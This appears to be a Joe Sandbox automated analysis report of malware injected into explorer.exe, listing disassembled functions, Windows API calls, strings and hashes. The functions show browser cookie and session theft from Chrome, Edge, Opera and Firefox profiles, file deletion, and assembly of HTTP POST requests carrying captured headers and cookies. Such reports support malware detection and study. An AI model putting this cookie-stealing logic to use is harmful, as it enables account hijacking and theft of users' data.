                                                      • API ID: Process$InformationQuery$Open
                                                      • String ID: chrome.exe|opera.exe|msedge.exe
                                                      • API String ID: 4117927671-3743313796
                                                      • Opcode ID: d765239eed22a84fe2a582faad1555bd170bfb445a8a896243ebaaeda78abc67
                                                      • Instruction ID: 74462bb72cca3f48bcbab1f2b981006a3a1547241742571b3dc85306c1ef6728
                                                      • Opcode Fuzzy Hash: d765239eed22a84fe2a582faad1555bd170bfb445a8a896243ebaaeda78abc67
                                                      • Instruction Fuzzy Hash: C6D0A932300222072B2C367A6C0A86FA48DEBC2A62302013EF982C7240EA908C0343A4
                                                      Function 00082974 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 157stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 222 82974-829a2 223 829a8-829aa 222->223 224 82b65-82b6d 222->224 223->224 225 829b0-829b9 call 81765 223->225 225->224 228 829bf-829c1 225->228 228->224 229 829c7-829c9 228->229 229->224 230 829cf-829df call 81141 229->230 230->224 233 829e5-82a0d call 81000 * 3 230->233 240 82a11 call 8104c 233->240 241 82a16-82a30 call 8285f 240->241 244 82a4c-82a64 call 8285f 241->244 245 82a32-82a42 call 8285f 241->245 251 82a6e-82a85 call 8285f 244->251 252 82a66-82a6c lstrcat 244->252 245->244 250 82a44-82a4a lstrcat 245->250 250->244 255 82a8f-82ab2 RtlZeroMemory call 8285f 251->255 256 82a87-82a8d lstrcat 251->256 252->251 259 82ac3 255->259 260 82ab4-82ac1 StrToIntA 255->260 256->255 261 82ac7-82ac9 259->261 260->261 262 82acb-82ace 261->262 263 82b42-82b64 call 8105d call 81011 * 3 261->263 262->263 265 82ad0-82ad7 262->265 263->224 265->263 267 82ad9-82adf 265->267 269 82ae5 call 8104c 267->269 271 82aea-82b29 wnsprintfA call 828ad 269->271 277 82b2b-82b2d lstrcat 271->277 278 82b2f-82b3e lstrcat * 2 271->278 277->278 278->263
                                                      APIs
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • Part of subcall function 0008104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00082A16,?,00000001), ref: 00081056
                                                        • Part of subcall function 0008285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 000828A2
                                                      • lstrcat.KERNEL32(00000000,dyn_header_host), ref: 00082A4A
                                                      • lstrcat.KERNEL32(00000001,dyn_header_path), ref: 00082A6C
                                                      • lstrcat.KERNEL32(?,dyn_header_ua), ref: 00082A8D
                                                      • RtlZeroMemory.NTDLL(?,0000000A), ref: 00082A96
                                                      • StrToIntA.SHLWAPI(00000000), ref: 00082AB9
                                                      • wnsprintfA.SHLWAPI ref: 00082B0D
                                                      • lstrcat.KERNEL32(00000000,?), ref: 00082B2D
                                                      • lstrcat.KERNEL32(00000000,{:!:}), ref: 00082B35
                                                      • lstrcat.KERNEL32(00000000,?), ref: 00082B3C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
                                                      • String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
                                                      • API String ID: 2605944266-950501416
                                                      • Opcode ID: 3708fc94a6399f6576d4b538be11fc28fac94a17c61d9412e710aaba2dbd2d1a
                                                      • Instruction ID: d8dd03a251d738af89b9767004e5c399ca865ed0c4bb03e024ab117a7b61717e
                                                      • Opcode Fuzzy Hash: 3708fc94a6399f6576d4b538be11fc28fac94a17c61d9412e710aaba2dbd2d1a
                                                      • Instruction Fuzzy Hash: BF516D706043419BDB19BF24C984AAEBBDABF98304F04081DF8C597293DB78DC468B66
                                                      Function 00082FAA Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 124stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                      • RtlZeroMemory.NTDLL(?,0000000A), ref: 00082FFA
                                                      • StrToIntA.SHLWAPI(?), ref: 00083024
                                                      • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00083347), ref: 00083052
                                                      • wsprintfA.USER32 ref: 000830B9
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 000830E5
                                                      • lstrcat.KERNEL32(?,{:!:}), ref: 000830F8
                                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,00086038), ref: 00083109
                                                      • RtlMoveMemory.NTDLL(00000000), ref: 00083112
                                                        • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                        • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
                                                      • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                                                      • API String ID: 2886538537-1627781280
                                                      • Opcode ID: 6b06f765faa35a0d88aaab11fad6d1e7495b49b1bec6b2203fc1a68d1a52bb17
                                                      • Instruction ID: 0ab628cf7cdd2d7bd700d5d11cd162a6a2ce618acf256a36fb072680de120010
                                                      • Opcode Fuzzy Hash: 6b06f765faa35a0d88aaab11fad6d1e7495b49b1bec6b2203fc1a68d1a52bb17
                                                      • Instruction Fuzzy Hash: 243193313002466BD704BB248C59BAF36AEBFC4B41F00443CFAC297283DA7999468BA1
                                                      Function 00083709 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 73stringsleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                        • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                                        • Part of subcall function 00081363: CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                        • Part of subcall function 00081363: lstrcmpi.KERNEL32(?), ref: 000813A3
                                                        • Part of subcall function 00081363: Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                                      • Sleep.KERNEL32(000003E8,?,00000000,00000001,?,?,00083839,?,00083C53,00000001), ref: 00083731
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083752
                                                      • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\), ref: 00083764
                                                        • Part of subcall function 000815BE: PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000815EB
                                                        • Part of subcall function 000815BE: FindFirstFileW.KERNEL32(00000000,?), ref: 000815F7
                                                        • Part of subcall function 000815BE: lstrcmpiW.KERNEL32(?,000841C8), ref: 00081623
                                                        • Part of subcall function 000815BE: lstrcmpiW.KERNEL32(?,000841CC), ref: 00081633
                                                        • Part of subcall function 000815BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 0008164C
                                                        • Part of subcall function 000815BE: FindNextFileW.KERNEL32(00000000,00000010), ref: 0008169C
                                                        • Part of subcall function 000815BE: FindClose.KERNEL32(00000000), ref: 000816AB
                                                      • RtlZeroMemory.NTDLL(00000000,00001000), ref: 0008377A
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083783
                                                      • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\), ref: 0008378F
                                                      • RtlZeroMemory.NTDLL(00000000,00001000), ref: 000837A3
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 000837AC
                                                      • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\), ref: 000837B8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
                                                      • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                                                      • API String ID: 909495591-1175993956
                                                      • Opcode ID: cc35f3566ee9868297273f9fa43087e24711ceae7b2c1c8a52be48be319707da
                                                      • Instruction ID: ec7ff4d470ff25c577ac56c1694f62454c323dd216fa13f948d3d90517649557
                                                      • Opcode Fuzzy Hash: cc35f3566ee9868297273f9fa43087e24711ceae7b2c1c8a52be48be319707da
                                                      • Instruction Fuzzy Hash: 7011027034571632F22033615C82FEF258DFFA6BA1F100024F2C56A2C2DED89E0247AA
                                                      Function 000835D4 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 64stringsleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                        • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                                        • Part of subcall function 00081363: CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                        • Part of subcall function 00081363: lstrcmpi.KERNEL32(?), ref: 000813A3
                                                        • Part of subcall function 00081363: Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                                      • Sleep.KERNEL32(000003E8,?,00000000,?,0008382F,?,00083C53,00000001), ref: 000835FA
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083613
                                                      • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\), ref: 00083623
                                                      • wsprintfW.USER32 ref: 00083644
                                                        • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                                        • Part of subcall function 000814D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                        • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                                        • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                        • Part of subcall function 000814D8: DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                        • Part of subcall function 000814D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                        • Part of subcall function 000814D8: FindClose.KERNEL32(00000000), ref: 0008158F
                                                        • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                        • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000), ref: 00083672
                                                      • lstrcatW.KERNEL32(00000000,00084614), ref: 00083682
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
                                                      • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                                                      • API String ID: 2436889709-3669280581
                                                      • Opcode ID: 0b2ddade066f348b97ee0b66d3a5b6175cf5d7b387e05ed159d19590711088c2
                                                      • Instruction ID: 047cd47d4e76235a8978023a5c5691358bac471f200d8a84fde17aeb494bc27d
                                                      • Opcode Fuzzy Hash: 0b2ddade066f348b97ee0b66d3a5b6175cf5d7b387e05ed159d19590711088c2
                                                      • Instruction Fuzzy Hash: 6F11703034060277FA143765AC9EFBE2599FFD6F42F150028B7C6AA2C2DE9849825769
                                                      Function 00083132 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 141stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 386 83132-83147 387 832ea-832f1 386->387 388 8314d-83179 386->388 390 8317b-8317f 388->390 391 83185-831e7 call 81000 388->391 390->387 390->391 397 831e9-831fa 391->397 398 83201-83226 call 81000 391->398 397->398 402 832d8-832e9 call 81011 * 2 398->402 403 8322c-83237 lstrlen 398->403 402->387 403->402 405 8323d-8324f call 81141 403->405 405->402 411 83255-832d2 call 81000 * 2 wsprintfA lstrcat call 81011 lstrcat lstrlen RtlMoveMemory 405->411 411->402
                                                      APIs
                                                      • lstrlen.KERNEL32(00000000), ref: 0008322D
                                                      • wsprintfA.USER32 ref: 0008329E
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 000832AF
                                                      • lstrcat.KERNEL32(00000000,{:!:}), ref: 000832BE
                                                      • lstrlen.KERNEL32(00000000), ref: 000832C1
                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 000832D2
                                                        • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                        • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                                                      • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                                                      • API String ID: 3430864794-1604029033
                                                      • Opcode ID: 34d713bb453a2b6e89e1fd23ceffbc516b4f29760a8a6e66774df0d2f5c2abac
                                                      • Instruction ID: 195aec8412d902ec1d20601123c3bc2efe934f71044cf50dfad01e2279433394
                                                      • Opcode Fuzzy Hash: 34d713bb453a2b6e89e1fd23ceffbc516b4f29760a8a6e66774df0d2f5c2abac
                                                      • Instruction Fuzzy Hash: 23415E71104345AFD311EF10DC48EABBBEDFF88745F00092EF58296252DB799A49CBA6
                                                      Function 00083449 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 109stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 419 83449-8346c RtlEnterCriticalSection 420 8346e-83474 419->420 421 834d4-834dc 419->421 420->421 424 83476-83478 420->424 422 835bc-835cb RtlLeaveCriticalSection 421->422 423 834e2-834eb call 81274 421->423 423->422 429 834f1-834f7 423->429 424->422 426 8347e-83487 call 81274 424->426 426->421 433 83489-83496 call 81274 426->433 431 834fd-83520 RtlZeroMemory call 82f3d 429->431 432 835b3-835b7 call 82d06 429->432 431->422 439 83526-83535 StrToIntA 431->439 432->422 433->421 440 83498-834bc lstrcat call 82faa 433->440 439->422 441 8353b-8354d call 81141 439->441 446 834be call 82f1f 440->446 441->422 447 8354f-83556 441->447 448 834c3-834ce call 8105d 446->448 449 83558-8356d 447->449 450 83595-835aa call 82faa 447->450 448->421 452 8357b-8357e 449->452 453 8356f-83574 call 8105d 449->453 461 835ac call 82f1f 450->461 457 83580 call 8104c 452->457 453->452 460 83585-83593 RtlMoveMemory 457->460 460->422 462 835b1 461->462 462->422
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(00086038), ref: 00083455
                                                      • lstrcat.KERNEL32 ref: 000834AB
                                                        • Part of subcall function 00082FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 00082FFA
                                                        • Part of subcall function 00082FAA: StrToIntA.SHLWAPI(?), ref: 00083024
                                                        • Part of subcall function 00082FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00083347), ref: 00083052
                                                        • Part of subcall function 00082FAA: wsprintfA.USER32 ref: 000830B9
                                                        • Part of subcall function 00082FAA: lstrcat.KERNEL32(00000000,00000000), ref: 000830E5
                                                        • Part of subcall function 00082F1F: CreateThread.KERNEL32(00000000,00000000,00082ED2,?,00000000,00000000), ref: 00082F2F
                                                        • Part of subcall function 00082F1F: CloseHandle.KERNEL32(00000000), ref: 00082F36
                                                        • Part of subcall function 0008105D: VirtualFree.KERNEL32(?,00000000,00008000,00082B4B), ref: 00081065
                                                      • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 00083504
                                                      • StrToIntA.SHLWAPI(?), ref: 0008352B
                                                      • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 0008358D
                                                      • RtlLeaveCriticalSection.NTDLL(00086038), ref: 000835C1
                                                        • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
                                                      • String ID: $Content-Length:$POST
                                                      • API String ID: 2960674810-114478848
                                                      • Opcode ID: 33a795ee5d16a2d667be42fa0e9aab825ee56be8159edec6b824bf9d928f01f4
                                                      • Instruction ID: 94e072d73854c321fe1628760210cd651d563a19d9d3a009ac864edf1f9d31a3
                                                      • Opcode Fuzzy Hash: 33a795ee5d16a2d667be42fa0e9aab825ee56be8159edec6b824bf9d928f01f4
                                                      • Instruction Fuzzy Hash: 7931C4306043418BEB11BF64D9686AB7BA9BF84701F01042DEAC29B353CB7E990DCF59
                                                      Function 000836A1 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 37sleepstringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                        • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                                        • Part of subcall function 00081363: CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                      • Sleep.KERNEL32(000003E8,?,00000000,?,00083834,?,00083C53,00000001), ref: 000836B3
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 000836CC
                                                      • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\), ref: 000836DC
                                                        • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                                        • Part of subcall function 000814D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                        • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                                        • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                        • Part of subcall function 000814D8: DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                        • Part of subcall function 000814D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                        • Part of subcall function 000814D8: FindClose.KERNEL32(00000000), ref: 0008158F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                                                      • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                                                      • API String ID: 2731919298-637609321
                                                      • Opcode ID: 4a60fd77e695e30bc64544faf5fe457681fedf5549bfe8e042cb7c116037b457
                                                      • Instruction ID: e4b6859fe632719e62c2471a373af4e41d7e2c2c30c1e964f33e307738a03490
                                                      • Opcode Fuzzy Hash: 4a60fd77e695e30bc64544faf5fe457681fedf5549bfe8e042cb7c116037b457
                                                      • Instruction Fuzzy Hash: A4F0A731300512339615336AAC0EDEF195DFFD7B52700012CB2C6962D2DE980943577A
                                                      Function 0008186C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 227COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • Part of subcall function 0008106C: lstrlen.KERNEL32(?,?,00000000,00000000,0008189F,75712B62,?,00000000), ref: 00081074
                                                        • Part of subcall function 0008106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00081086
                                                        • Part of subcall function 000817DC: RtlZeroMemory.NTDLL(?,00000018), ref: 000817EE
                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 000818FB
                                                      • wsprintfW.USER32 ref: 000819F2
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00081AD0
                                                      Strings
                                                      • POST, xrefs: 000819A0
                                                      • Accept: */*Referer: %S, xrefs: 000819E8
                                                      • Content-Type: application/x-www-form-urlencoded, xrefs: 00081A34
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                      • API String ID: 3833683434-704803497
                                                      • Opcode ID: c7c917da75e3de295780b2872cffdc73b6cef6b8f53e9712146f35d9d993187b
                                                      • Instruction ID: 3dcbdeb0ded9a8cf15a9f97d83848ce06ad77dce3e8d70dcbeb4fea29dcfcf14
                                                      • Opcode Fuzzy Hash: c7c917da75e3de295780b2872cffdc73b6cef6b8f53e9712146f35d9d993187b
                                                      • Instruction Fuzzy Hash: 648145B1608301AFD714AF68DC88AABBAEDFF88744F00092DF585D3251EB75D946CB52
                                                      Function 000823E3 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 190stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0008104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00082A16,?,00000001), ref: 00081056
                                                      • lstrcat.KERNEL32(?,00000000), ref: 000825BB
                                                      • lstrcat.KERNEL32(?,000842A8), ref: 000825C7
                                                      • lstrcat.KERNEL32(?,?), ref: 000825D6
                                                      • lstrcat.KERNEL32(?,000842AC), ref: 000825E5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrcat$AllocVirtual
                                                      • String ID: :authority$?$dyn_header
                                                      • API String ID: 3028025275-1785586894
                                                      • Opcode ID: ccb5b8e22301a9bf3d49878ed53380449b588dc010ab43c1b70d9856686de837
                                                      • Instruction ID: a3df1192de0655e9dc7a3e2b16972a5207b0361e37cf12fd9c8c807a48e009f7
                                                      • Opcode Fuzzy Hash: ccb5b8e22301a9bf3d49878ed53380449b588dc010ab43c1b70d9856686de837
                                                      • Instruction Fuzzy Hash: CC61E3725087128FC710FE24D5906AEB7E6BB94350F44092DF8C157283EA399E0EDB62
                                                      Function 00081363 Relevance: 7.5, APIs: 5, Instructions: 39processstringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                      • Process32First.KERNEL32(00000000,?), ref: 00081393
                                                      • lstrcmpi.KERNEL32(?), ref: 000813A3
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                                      • CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                      • String ID:
                                                      • API String ID: 868014591-0
                                                      • Opcode ID: 73177a2627c4fc77625abdc81e2021d595d42a0398085b95e880686d4ba7af21
                                                      • Instruction ID: f597f1abedfdb78b4a50bf3d8acbfe31b34690e914edc3f9a8282d2ed78ac4e0
                                                      • Opcode Fuzzy Hash: 73177a2627c4fc77625abdc81e2021d595d42a0398085b95e880686d4ba7af21
                                                      • Instruction Fuzzy Hash: 34F0C8315011149BE7706B25AC08BDF7BBCFF09321F0001A0F9D9E2190EB784E558F91
                                                      Function 000828AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                      • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 0008291B
                                                      • lstrcat.KERNEL32(?,000842BC), ref: 0008292A
                                                      • lstrlen.KERNEL32(?,75712B62,00000001,?,?,00000000,?,?,00082B26,?,?,?,?,00000001), ref: 0008295C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$MemoryMovelstrcat
                                                      • String ID: cookie
                                                      • API String ID: 2957667536-1295510418
                                                      • Opcode ID: c5afd10081fade78214e6a68e20e854c8f611a32984c2bd6fd75a9e92cb63cea
                                                      • Instruction ID: f53226ebe774a6e1b9e5076833723ffb49a62c81fd320fd2bb11fdc6a523b402
                                                      • Opcode Fuzzy Hash: c5afd10081fade78214e6a68e20e854c8f611a32984c2bd6fd75a9e92cb63cea
                                                      • Instruction Fuzzy Hash: 0411B7323083029BD711BE94DC89B9BB7D9FF90714F14052DFDC197242EAB5E80A4791
                                                      Function 000812AA Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000400,00000000), ref: 000812BC
                                                      • IsWow64Process.KERNEL32(000000FF,?), ref: 000812CE
                                                      • IsWow64Process.KERNEL32(00000000,?), ref: 000812E1
                                                      • CloseHandle.KERNEL32(00000000), ref: 000812F7
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                      • String ID:
                                                      • API String ID: 331459951-0
                                                      • Opcode ID: 8045010c9cbfc985abfaa60064913a4c16ec6c63ecb239f4c664f1a8ebcca392
                                                      • Instruction ID: 4c13458c48fa9fbbcfea10e07012997bffba25426b6b543f99b22ac2bec5ef8b
                                                      • Opcode Fuzzy Hash: 8045010c9cbfc985abfaa60064913a4c16ec6c63ecb239f4c664f1a8ebcca392
                                                      • Instruction Fuzzy Hash: 1DF09071806219FFAB20DFA0AD449EFBBBCFF01251F20426AE941D2140DB354E029BA1
